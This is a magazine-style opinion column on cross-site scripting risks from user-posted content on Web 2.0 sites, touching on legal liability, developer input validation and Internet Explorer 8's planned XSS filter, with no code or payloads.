Although Web 2.0 technology allows us to do things on the Internet that were never before possible, there is a certain amount of risk that comes into play any time a site offers a high degree of interactivity. In fact, there have been several documented cases of people using otherwise legitimate Web 2.0 sites as a mechanism for spreading a malware virus.
Brien M. Posey
The reason why Web 2.0 presents such a security risk has to do with a site's level of interactivity. Websites such as YouTube and MySpace allow users to upload files and post other types of content. Those files with malicious intent have been known to perform cross-site scripting (XSS) attacks.
This type of attack involves either uploading malicious files to a Web 2.0 site or embedded Java or Ajax scripts within text input fields. When other visitors to the site reach a page containing a malicious script or download malicious files from the site to their computers, their machines become infected.
Certainly, this is a major security threat, but let's move beyond the obvious. For starters, most security software treats well-known Web 2.0 sites as being completely safe. Of course the site itself is safe, but the content posted on the site by other users may not be. This means users may be exposed to malicious viruses on sites that have been classified as safe.
Another problem with the malicious use of otherwise benign websites is the legal ramifications. I don't think the legal issues have completely shaken themselves out yet, but there has been a lot of speculation lately that a website owner could potentially be held liable for the malicious use of his site, even if there is nothing malicious about the site itself. This speculation is based on the idea that a site owner could potentially be found to be negligent in his security practices, thereby allowing the exploit to happen.
Of course the legal issues work both ways. There are plenty of security companies that blacklist and whitelist websites based on whether or not those sites are safe. Such a company would face a tremendous backlash if it ever blacklisted a site such as MySpace or classified it as unsafe, but it might face legal action from users if such a site did happen to contain malicious content.
Ultimately, the only way to really address cross-site scripting attacks is for Web developers to bring security to the forefront of every design decision. Essentially, Web applications need to be coded so all user input is treated as "evil" until proven otherwise. This means Web developers must initially assume that all input is malicious, and then parse the input in a way that reliably separates the good input from the bad.
The problem with this is that not all Web developers can be trusted to protect users against malicious use of an otherwise legitimate site. Because you can never really tell for sure whether a site is being exploited by those with malicious intent, Microsoft is also taking steps to do something about cross-site scripting vulnerabilities. Internet Explorer 8 is slated to be the first version of the browser with a built-in cross-site scripting filter.
Although Internet Explorer 8 has been in beta testing for quite some time now, it remains to be seen how well Microsoft's new cross-site scripting filter will work when the browser is finally released. Microsoft is walking a fine line in that it must design the filter in a way that provides adequate protection, without breaking Web 2.0 applications or pestering users with constant nag screens.
Anytime a new technology emerges, there are certain unforeseen problems that initially come along with it, and the same goes for Web 2.0. I think that as browser security and Web application coding practices improve, though, cross-site scripting attacks will become less of a problem.
Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. He has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. Write to him at firstname.lastname@example.org.